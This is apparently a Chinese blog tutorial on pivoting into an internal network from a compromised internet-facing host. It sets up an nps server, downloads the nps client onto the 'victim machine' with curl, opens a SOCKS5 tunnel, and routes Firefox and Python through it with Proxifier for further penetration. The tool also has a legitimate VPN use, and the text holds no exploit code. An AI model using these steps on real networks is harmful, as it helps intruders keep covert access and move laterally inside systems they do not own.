前言

当我们拿到一台外网机的权限，如何方便的渗透内网机器呢？这时就需要把这台外网机当作跳板机，利用nps搭建代理，用socks5协议把内网的流量代理出来

当然，这种方法也可以用来自建VPN，也就是用国外的服务器来代理。

nps的配置

首先贴一下文档https://ehang-io.github.io/nps/#/install

按照文档来就行，不过这里还是记录一下步骤。

首先在GitHub的release这里下载https://github.com/ehang-io/nps/releases

我的服务器是centos的，所以下载这个。

下载之后放到服务器上，

修改nps.conf为

appname = nps
#Boot mode(dev|pro)
runmode = dev

##bridge
# 底层通信协议，默认tcp，可选用kcp
bridge_type=tcp
# 底层通信端口，默认8024，如已被占用请指定其他端口
bridge_port=8024
bridge_ip=0.0.0.0

# 当客户端以配置文件模式启动时会用到的验证密钥，可自行设置，本教程不会使用到
public_vkey=12345678

#web
web_host=服务器IP
web_username=username
web_password=password
web_port = 端口号
web_ip=0.0.0.0

然后sudo ./nps install

sudo nps start

服务器没有报错就开启了。注意，把安全组端口打开。不然访问不了

浏览器访问服务器:IP。登录。点开客户端，点新增

然后我们需要根据受害机器来下载对应的客户端

这里我选择。

然后把这个东西上传到受害机器。

curl -o /linux_amd64_client.tar.gz https://github.com/ehang-io/nps/releases/download/v0.26.10/linux_amd64_client.tar.gz

然后解压。

然后然后把这一条命令复制到受害机器上

刷新一下发现已经在线，说明成功。

然后在左侧点击SOCKS5代理设置一下，客户端ID要填对。保存一下

此时代理就在8003端口开启了。

测试一下。

内网访问一下宝塔

说明成功但是这种样子只能在浏览器中进行代理，那么如何让所有流量(比如python)全部经过代理呢？

这时候就需要配置Proxifier

配置Proxifier

下载好以后直接左上工具栏Profile->add

填好地址和端口之后选择SOCKS5。然后点OK就可以了。

然后我们可以在这里设置代理规则。

![image-20210430094122601](https://i.loli.net/2021/04/30/t37duK12sUbCfe4.pn我们可以把火狐和python设置为代理。那么这两个软件就会走代理。用来渗透。